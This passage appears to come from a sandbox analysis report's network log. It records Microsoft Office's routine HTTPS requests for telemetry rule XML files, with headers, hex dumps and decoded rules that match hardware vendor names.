                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          50192.168.2.44981513.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:25 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:25 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:25 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 464
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                          ETag: "0x8DC582B97FB6C3C"
                                                                                                                          x-ms-request-id: 9ffa30f7-401e-000a-3a5c-3d4a7b000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154325Z-174c587ffdf4zw2thC1TEBu34000000006a00000000017k7
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:25 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          51192.168.2.44981613.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:25 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:25 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:25 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 494
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                          ETag: "0x8DC582BB7010D66"
                                                                                                                          x-ms-request-id: e7bb18f6-501e-000a-54a9-3b0180000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154325Z-174c587ffdfb485jhC1TEBmc1s00000005v000000000w1v5
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:25 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          52192.168.2.44981813.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:27 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:27 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:27 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                          ETag: "0x8DC582B9748630E"
                                                                                                                          x-ms-request-id: c77577e7-501e-0078-0da6-3e06cf000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154327Z-178bfbc474bvjk8shC1NYC83ns00000007eg00000000m5nb
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:27 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          53192.168.2.44981913.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:27 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:27 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:27 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 472
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                          ETag: "0x8DC582B9DACDF62"
                                                                                                                          x-ms-request-id: 14f5e79a-001e-0014-2864-3d5151000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154327Z-15b8b599d88l2dpthC1TEBmzr00000000650000000006met
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:27 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          54192.168.2.44982013.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:27 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:28 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:27 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 404
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                          ETag: "0x8DC582B9E8EE0F3"
                                                                                                                          x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154327Z-178bfbc474bmqmgjhC1NYCy16c00000007ug0000000036p9
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:28 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          55192.168.2.44982213.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:27 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:28 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:28 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 428
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                          ETag: "0x8DC582BAC4F34CA"
                                                                                                                          x-ms-request-id: 876ff6fa-901e-00a0-47eb-3d6a6d000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154328Z-178bfbc474bxkclvhC1NYC69g400000007mg00000000cexa
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:28 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          56192.168.2.44982113.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:27 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:28 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:28 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 468
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                          ETag: "0x8DC582B9C8E04C8"
                                                                                                                          x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154328Z-174c587ffdf89smkhC1TEB697s000000064000000000sccy
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:28 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          57192.168.2.44982713.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:29 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:29 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:29 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 499
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                          ETag: "0x8DC582B98CEC9F6"
                                                                                                                          x-ms-request-id: aaf2b452-f01e-0071-621c-3e431c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154329Z-178bfbc474bpnd5vhC1NYC4vr400000007m000000000meqk
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:29 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          58192.168.2.44982813.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:29 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:30 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:30 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 415
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                          ETag: "0x8DC582B988EBD12"
                                                                                                                          x-ms-request-id: 8017546c-101e-000b-4720-3d5e5c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154330Z-178bfbc474bpnd5vhC1NYC4vr400000007k000000000qnkt
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          59192.168.2.44982913.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:30 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:30 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:30 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 471
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                          ETag: "0x8DC582BB5815C4C"
                                                                                                                          x-ms-request-id: fe73205f-901e-0015-38e3-3eb284000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154330Z-15b8b599d88qw29phC1TEB5zag000000064g00000000a4vf
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:30 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          60192.168.2.44983113.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:30 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:30 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:30 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
